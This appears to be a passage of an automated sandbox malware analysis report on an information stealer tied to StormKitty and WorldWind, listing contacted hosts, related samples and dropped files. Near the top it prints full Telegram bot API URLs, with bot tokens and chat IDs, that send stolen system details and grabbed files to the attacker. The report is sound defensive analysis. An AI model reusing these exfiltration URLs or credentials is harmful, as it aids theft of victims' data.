                                        https://api.telegram.org/bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202024-08-20%205:06:19%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20506013%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%201PKE1OBC%0ARAM:%204095MB%0AHWID:%205D1E7ABD56%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%201%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2030%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2020%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=Truetrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://pastebin.com/raw/7B75u64Bfalse
                                        • Avira URL Cloud: safe
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtabtmpD614.tmp.dat.0.dr, tmpD5A3.tmp.dat.0.drfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://api.telegram.org/bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283vYz1Z2heor.exe, 00000000.00000002.3833961321.0000000002BCE000.00000004.00000800.00020000.00000000.sdmp, vYz1Z2heor.exe, 00000000.00000002.3833961321.000000000268A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://duckduckgo.com/ac/?q=tmpD614.tmp.dat.0.dr, tmpD5A3.tmp.dat.0.drfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13vYz1Z2heor.exefalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://api.telegram.orgvYz1Z2heor.exe, 00000000.00000002.3833961321.0000000002633000.00000004.00000800.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icotmpD614.tmp.dat.0.dr, tmpD5A3.tmp.dat.0.drfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://api.telegram.org/botvYz1Z2heor.exetrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://api.telegram.org/bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendMessage?chat_id=57954vYz1Z2heor.exe, 00000000.00000002.3833961321.0000000002633000.00000004.00000800.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tmpD614.tmp.dat.0.dr, tmpD5A3.tmp.dat.0.drfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://api.telegram.orgDvYz1Z2heor.exe, 00000000.00000002.3833961321.000000000268A000.00000004.00000800.00020000.00000000.sdmp, vYz1Z2heor.exe, 00000000.00000002.3833961321.0000000002B7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://pastebin.comdvYz1Z2heor.exe, 00000000.00000002.3833961321.0000000002B99000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=tmpD614.tmp.dat.0.dr, tmpD5A3.tmp.dat.0.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://support.mozilla.org/products/firefoxgro.allizom.troppus.njy8xaI_aUJptmpD724.tmp.dat.0.drfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.ecosia.org/newtab/tmpD614.tmp.dat.0.dr, tmpD5A3.tmp.dat.0.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brtmpD724.tmp.dat.0.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://pastebin.com/raw/7B7PvYz1Z2heor.exe, 00000000.00000002.3833961321.0000000002B7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://ac.ecosia.org/autocomplete?q=tmpD614.tmp.dat.0.dr, tmpD5A3.tmp.dat.0.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://github.com/LimerBoy/StormKittyvYz1Z2heor.exefalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchtmpD614.tmp.dat.0.dr, tmpD5A3.tmp.dat.0.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://github.com/LimerBoy/StormKitty0&vYz1Z2heor.exe, 00000000.00000002.3833961321.00000000025A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://api.telegram.orgdvYz1Z2heor.exe, 00000000.00000002.3833961321.000000000268A000.00000004.00000800.00020000.00000000.sdmp, vYz1Z2heor.exe, 00000000.00000002.3833961321.0000000002B8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://support.mozilla.orgtmpD724.tmp.dat.0.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://api.telegram.org/file/botvYz1Z2heor.exefalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://api.telegram.orgvYz1Z2heor.exe, 00000000.00000002.3833961321.000000000268A000.00000004.00000800.00020000.00000000.sdmp, vYz1Z2heor.exe, 00000000.00000002.3833961321.0000000002B8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevYz1Z2heor.exe, 00000000.00000002.3833961321.00000000025A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://pastebin.comvYz1Z2heor.exe, 00000000.00000002.3833961321.0000000002B99000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tmpD614.tmp.dat.0.dr, tmpD5A3.tmp.dat.0.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://pastebin.comvYz1Z2heor.exe, 00000000.00000002.3833961321.000000000268A000.00000004.00000800.00020000.00000000.sdmp, vYz1Z2heor.exe, 00000000.00000002.3833961321.0000000002B7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://api.telegram.org/bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendDocument?chat_id=5795vYz1Z2heor.exe, 00000000.00000002.3833961321.0000000002B7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        149.154.167.220
                                        		api.telegram.orgUnited Kingdom
                                        		62041TELEGRAMRUtrue
                                        172.67.19.24
                                        		pastebin.comUnited States
                                        		13335CLOUDFLARENETUStrue
                                        104.16.185.241
                                        		icanhazip.comUnited States
                                        		13335CLOUDFLARENETUSfalse
                                        172.67.196.114
                                        		api.mylnikov.orgUnited States
                                        		13335CLOUDFLARENETUSfalse

                                        Private

                                        IP
                                        127.0.0.1

                                        General Information

                                        Joe Sandbox version:40.0.0 Tourmaline
                                        Analysis ID:1495519
                                        Start date and time:2024-08-20 11:05:10 +02:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 7m 45s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:15
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:vYz1Z2heor.exe
                                        renamed because original name is a hash value
                                        Original Sample Name:7f1630df6b57af024a3b561bdadc208f.exe
                                        Detection:MAL
                                        Classification:mal100.rans.troj.spyw.evad.winEXE@17/90@6/5
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 120
                                        • Number of non-executed functions: 8
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                        Warnings

                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        05:06:28API Interceptor10146606x Sleep call for process: vYz1Z2heor.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        149.154.167.220AWB 3486458032.bat.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                          New Order.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            hesaphareketi.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                              Deposit Slip 20240819.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                DHL_AWB# 27069033693.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  Payment Notice.exeGet hashmaliciousAgentTeslaBrowse
                                                    file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      lPq4mW9QT0.exeGet hashmaliciousGo InjectorBrowse
                                                        385It0O8ENqQwR3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          copia de pago.pdf.exeGet hashmaliciousDarkCloudBrowse
                                                            172.67.19.24sostener.vbsGet hashmaliciousRemcosBrowse
                                                            • pastebin.com/raw/V9y5Q5vv
                                                            Invoice Payment N8977823.jsGet hashmaliciousWSHRATBrowse
                                                            • pastebin.com/raw/NsQ5qTHr
                                                            Pending_Invoice_Bank_Details_XLSX.jsGet hashmaliciousWSHRATBrowse
                                                            • pastebin.com/raw/NsQ5qTHr
                                                            Dadebehring PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
                                                            • pastebin.com/raw/NsQ5qTHr
                                                            PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
                                                            • pastebin.com/raw/NsQ5qTHr
                                                            104.16.185.241WinRAR 7.01 Pro.exeGet hashmaliciousPureLog Stealer, WorldWind StealerBrowse
                                                            • icanhazip.com/
                                                            PasteHook.exeGet hashmaliciousAsyncRAT, DCRat, StormKitty, WorldWind Stealer, XmrigBrowse
                                                            • icanhazip.com/
                                                            eEo6DAcnnx.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                            • icanhazip.com/
                                                            5oci4lcontract.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                            • icanhazip.com/
                                                            viVOqZjAT0.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                            • icanhazip.com/
                                                            down.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                            • icanhazip.com/
                                                            7Y18r(198).exeGet hashmaliciousUpatreBrowse
                                                            • icanhazip.com/
                                                            LisectAVT_2403002B_340.exeGet hashmaliciousBdaejec, UpatreBrowse
                                                            • icanhazip.com/
                                                            LisectAVT_2403002B_4.exeGet hashmaliciousAsyncRAT, Neshta, StormKitty, WorldWind StealerBrowse
                                                            • icanhazip.com/
                                                            7Y18r(114).exeGet hashmaliciousUnknownBrowse
                                                            • icanhazip.com/

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            pastebin.combuidl.exeGet hashmaliciousXWormBrowse
                                                            • 172.67.19.24
                                                            Setup3.exeGet hashmaliciousUnknownBrowse
                                                            • 104.20.4.235
                                                            file.exeGet hashmaliciousUnknownBrowse
                                                            • 104.20.3.235
                                                            file.exeGet hashmaliciousUnknownBrowse
                                                            • 104.20.4.235
                                                            SecuriteInfo.com.Win64.Evo-gen.15723.9736.exeGet hashmaliciousUnknownBrowse
                                                            • 172.67.19.24
                                                            file.exeGet hashmaliciousUnknownBrowse
                                                            • 104.20.4.235
                                                            file.exeGet hashmaliciousUnknownBrowse
                                                            • 104.20.4.235
                                                            file.exeGet hashmaliciousUnknownBrowse
                                                            • 104.20.4.235
                                                            file.exeGet hashmaliciousCryptbotBrowse
                                                            • 104.20.4.235
                                                            file.exeGet hashmaliciousUnknownBrowse
                                                            • 172.67.19.24
                                                            api.mylnikov.orgWinRAR 7.01 Pro.exeGet hashmaliciousPureLog Stealer, WorldWind StealerBrowse
                                                            • 104.21.44.66
                                                            PasteHook.exeGet hashmaliciousAsyncRAT, DCRat, StormKitty, WorldWind Stealer, XmrigBrowse
                                                            • 104.21.44.66
                                                            eEo6DAcnnx.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                            • 172.67.196.114
                                                            83MZfLKh7D.exeGet hashmaliciousAsyncRAT, Discord Token Stealer, Luca Stealer, MicroClip, RedLineBrowse
                                                            • 104.21.44.66
                                                            viVOqZjAT0.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                            • 104.21.44.66
                                                            LisectAVT_2403002B_4.exeGet hashmaliciousAsyncRAT, Neshta, StormKitty, WorldWind StealerBrowse
                                                            • 172.67.196.114
                                                            2U1S7Ab7YU.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                            • 172.67.196.114
                                                            xj40xovMsm.exeGet hashmaliciousAsyncRAT, AveMaria, Keyzetsu Clipper, MicroClip, PureLog Stealer, RL STEALER, RedLineBrowse
                                                            • 172.67.196.114
                                                            Kh7W85ONS7.exeGet hashmaliciousAsyncRAT, DarkTortilla, StormKitty, WorldWind StealerBrowse
                                                            • 104.21.44.66
                                                            zrrHgsDzgS.exeGet hashmaliciousAsyncRAT, PureLog Stealer, StormKitty, WorldWind Stealer, zgRATBrowse
                                                            • 104.21.44.66
                                                            api.telegram.orgAWB 3486458032.bat.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            New Order.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 149.154.167.220
                                                            hesaphareketi.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            Deposit Slip 20240819.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            DHL_AWB# 27069033693.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            Payment Notice.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 149.154.167.220
                                                            file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            lPq4mW9QT0.exeGet hashmaliciousGo InjectorBrowse
                                                            • 149.154.167.220
                                                            385It0O8ENqQwR3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            copia de pago.pdf.exeGet hashmaliciousDarkCloudBrowse
                                                            • 149.154.167.220
                                                            icanhazip.com4b27fd5c70588d922a25f658f35d5c5d3e0085ba88d9bb9b25746c52b2b58e59_dump.exeGet hashmaliciousPureLog Stealer, SmokeLoader, TrojanRansom, zgRATBrowse
                                                            • 104.16.184.241
                                                            WinRAR 7.01 Pro.exeGet hashmaliciousPureLog Stealer, WorldWind StealerBrowse
                                                            • 104.16.185.241
                                                            PasteHook.exeGet hashmaliciousAsyncRAT, DCRat, StormKitty, WorldWind Stealer, XmrigBrowse
                                                            • 104.16.185.241
                                                            eEo6DAcnnx.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                            • 104.16.185.241
                                                            83MZfLKh7D.exeGet hashmaliciousAsyncRAT, Discord Token Stealer, Luca Stealer, MicroClip, RedLineBrowse
                                                            • 104.16.184.241
                                                            5oci4lcontract.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                            • 104.16.185.241
                                                            Inquiry.vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                            • 104.16.184.241
                                                            viVOqZjAT0.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                            • 104.16.185.241
                                                            down.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                            • 104.16.185.241
                                                            7Y18r(198).exeGet hashmaliciousUpatreBrowse
                                                            • 104.16.185.241

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            TELEGRAMRUAWB 3486458032.bat.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            New Order.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 149.154.167.220
                                                            hesaphareketi.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            Deposit Slip 20240819.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            DHL_AWB# 27069033693.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            Payment Notice.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 149.154.167.220
                                                            file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            lPq4mW9QT0.exeGet hashmaliciousGo InjectorBrowse
                                                            • 149.154.167.220
                                                            385It0O8ENqQwR3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            copia de pago.pdf.exeGet hashmaliciousDarkCloudBrowse
                                                            • 149.154.167.220
                                                            CLOUDFLARENETUShttps://i.dhlecommerce.co.uk/kpSXQBKsGet hashmaliciousUnknownBrowse
                                                            • 104.18.28.127
                                                            https://cylinder-gazelle-9pyh.squarespace.com/Get hashmaliciousHTMLPhisherBrowse
                                                            • 188.114.96.3
                                                            https://msftexperience.qualtrics.com/jfe/form/SV_b1PzoUF1L5qlw1g?Q_DL=i8Vov6mVjGVgerA_b1PzoUF1L5qlw1g_CGC_mfeOsf0MeRbL2Wx&Q_CHL=emailGet hashmaliciousUnknownBrowse
                                                            • 104.18.86.42
                                                            doc09125520240407073114.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 104.21.22.240
                                                            https://cas5-0-urlprotect.trendmicro.com:443/wis/clicktime/v1/query?url=https%3a%2f%2fwww.canva.com%2fdesign%2fDAGOBu%2dr3%5fc%2fbUsM2Sfr6SrtzWJ0MuOlTA%2fview%3futm%5fcontent%3dDAGOBu%2dr3%5fc%26utm%5fcampaign%3ddesignshare%26utm%5fmedium%3dlink%26utm%5fsource%3deditor&umid=34124fae-5be2-11ef-90ef-6045bd958b11&auth=bb06dfad69550b02ce860f7670981749648d9c57-548539a071453819ed1e8beeeda5850224d87a71Get hashmaliciousUnknownBrowse
                                                            • 104.16.103.112
                                                            Transaction_Details_[PDF]_#2009TYZ.htmlGet hashmaliciousHTMLPhisherBrowse
                                                            • 104.17.25.14
                                                            Filename.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                            • 104.21.87.201
                                                            phish_alert_sp2_2.0.0.0.emlGet hashmaliciousUnknownBrowse
                                                            • 104.18.69.40
                                                            774730925310.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 188.114.97.3
                                                            AWB 3486458032.bat.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                            • 188.114.96.3
                                                            CLOUDFLARENETUShttps://i.dhlecommerce.co.uk/kpSXQBKsGet hashmaliciousUnknownBrowse
                                                            • 104.18.28.127
                                                            https://cylinder-gazelle-9pyh.squarespace.com/Get hashmaliciousHTMLPhisherBrowse
                                                            • 188.114.96.3
                                                            https://msftexperience.qualtrics.com/jfe/form/SV_b1PzoUF1L5qlw1g?Q_DL=i8Vov6mVjGVgerA_b1PzoUF1L5qlw1g_CGC_mfeOsf0MeRbL2Wx&Q_CHL=emailGet hashmaliciousUnknownBrowse
                                                            • 104.18.86.42
                                                            doc09125520240407073114.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 104.21.22.240
                                                            https://cas5-0-urlprotect.trendmicro.com:443/wis/clicktime/v1/query?url=https%3a%2f%2fwww.canva.com%2fdesign%2fDAGOBu%2dr3%5fc%2fbUsM2Sfr6SrtzWJ0MuOlTA%2fview%3futm%5fcontent%3dDAGOBu%2dr3%5fc%26utm%5fcampaign%3ddesignshare%26utm%5fmedium%3dlink%26utm%5fsource%3deditor&umid=34124fae-5be2-11ef-90ef-6045bd958b11&auth=bb06dfad69550b02ce860f7670981749648d9c57-548539a071453819ed1e8beeeda5850224d87a71Get hashmaliciousUnknownBrowse
                                                            • 104.16.103.112
                                                            Transaction_Details_[PDF]_#2009TYZ.htmlGet hashmaliciousHTMLPhisherBrowse
                                                            • 104.17.25.14
                                                            Filename.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                            • 104.21.87.201
                                                            phish_alert_sp2_2.0.0.0.emlGet hashmaliciousUnknownBrowse
                                                            • 104.18.69.40
                                                            774730925310.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 188.114.97.3
                                                            AWB 3486458032.bat.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                            • 188.114.96.3
                                                            CLOUDFLARENETUShttps://i.dhlecommerce.co.uk/kpSXQBKsGet hashmaliciousUnknownBrowse
                                                            • 104.18.28.127
                                                            https://cylinder-gazelle-9pyh.squarespace.com/Get hashmaliciousHTMLPhisherBrowse
                                                            • 188.114.96.3
                                                            https://msftexperience.qualtrics.com/jfe/form/SV_b1PzoUF1L5qlw1g?Q_DL=i8Vov6mVjGVgerA_b1PzoUF1L5qlw1g_CGC_mfeOsf0MeRbL2Wx&Q_CHL=emailGet hashmaliciousUnknownBrowse
                                                            • 104.18.86.42
                                                            doc09125520240407073114.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 104.21.22.240
                                                            https://cas5-0-urlprotect.trendmicro.com:443/wis/clicktime/v1/query?url=https%3a%2f%2fwww.canva.com%2fdesign%2fDAGOBu%2dr3%5fc%2fbUsM2Sfr6SrtzWJ0MuOlTA%2fview%3futm%5fcontent%3dDAGOBu%2dr3%5fc%26utm%5fcampaign%3ddesignshare%26utm%5fmedium%3dlink%26utm%5fsource%3deditor&umid=34124fae-5be2-11ef-90ef-6045bd958b11&auth=bb06dfad69550b02ce860f7670981749648d9c57-548539a071453819ed1e8beeeda5850224d87a71Get hashmaliciousUnknownBrowse
                                                            • 104.16.103.112
                                                            Transaction_Details_[PDF]_#2009TYZ.htmlGet hashmaliciousHTMLPhisherBrowse
                                                            • 104.17.25.14
                                                            Filename.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                            • 104.21.87.201
                                                            phish_alert_sp2_2.0.0.0.emlGet hashmaliciousUnknownBrowse
                                                            • 104.18.69.40
                                                            774730925310.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 188.114.97.3
                                                            AWB 3486458032.bat.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                            • 188.114.96.3

                                                            JA3 Fingerprints

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            3b5074b1b5d032e5620f69f9f700ff0eXCc5WuJdF7.exeGet hashmaliciousZhark RATBrowse
                                                            • 149.154.167.220
                                                            • 172.67.196.114
                                                            • 172.67.19.24
                                                            https://poczta.i-host.pl/Get hashmaliciousUnknownBrowse
                                                            • 149.154.167.220
                                                            • 172.67.196.114
                                                            • 172.67.19.24
                                                            https://api.wiw.io/public/twitter-card?image_url=https://static.wiw.io/prod/twitter-card-image/profile/92a86cbc-de1a-4d11-816f-1c8c68b24c0c-c1038513&redirect_url=https://flagstoreu9049060048844.s3.amazonaws.com/index.htmlGet hashmaliciousUnknownBrowse
                                                            • 149.154.167.220
                                                            • 172.67.196.114
                                                            • 172.67.19.24
                                                            Transaction_Details_[PDF]_#2009TYZ.htmlGet hashmaliciousHTMLPhisherBrowse
                                                            • 149.154.167.220
                                                            • 172.67.196.114
                                                            • 172.67.19.24
                                                            AWB 3486458032.bat.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            • 172.67.196.114
                                                            • 172.67.19.24
                                                            New Order.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 149.154.167.220
                                                            • 172.67.196.114
                                                            • 172.67.19.24
                                                            sz4ypfkelT.exeGet hashmaliciousUnknownBrowse
                                                            • 149.154.167.220
                                                            • 172.67.196.114
                                                            • 172.67.19.24
                                                            V58VVR64wc.exeGet hashmaliciousUnknownBrowse
                                                            • 149.154.167.220
                                                            • 172.67.196.114
                                                            • 172.67.19.24
                                                            wiXku8sNM3.exeGet hashmaliciousUnknownBrowse
                                                            • 149.154.167.220
                                                            • 172.67.196.114
                                                            • 172.67.19.24
                                                            l6UA0MG4eo.exeGet hashmaliciousUnknownBrowse
                                                            • 149.154.167.220
                                                            • 172.67.196.114
                                                            • 172.67.19.24

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\152940744e411e0b9d8f4d08ec52fe95\msgid.dat

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:V:V
                                                            MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                            SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                            SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                            SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            Preview:0

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH.zip

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                            Category:dropped
                                                            Size (bytes):119304
                                                            Entropy (8bit):7.926106958300375
                                                            Encrypted:false
                                                            SSDEEP:3072:/+C0uma+mU5V8OiKRuKsimbrUGWbY61Y7:fOiKRuKHDGWU
                                                            MD5:FC8376B971568FBC83D9CF5B143ABDD8
                                                            SHA1:C4F535885847F6693A0272F5AE737AB49F572BD2
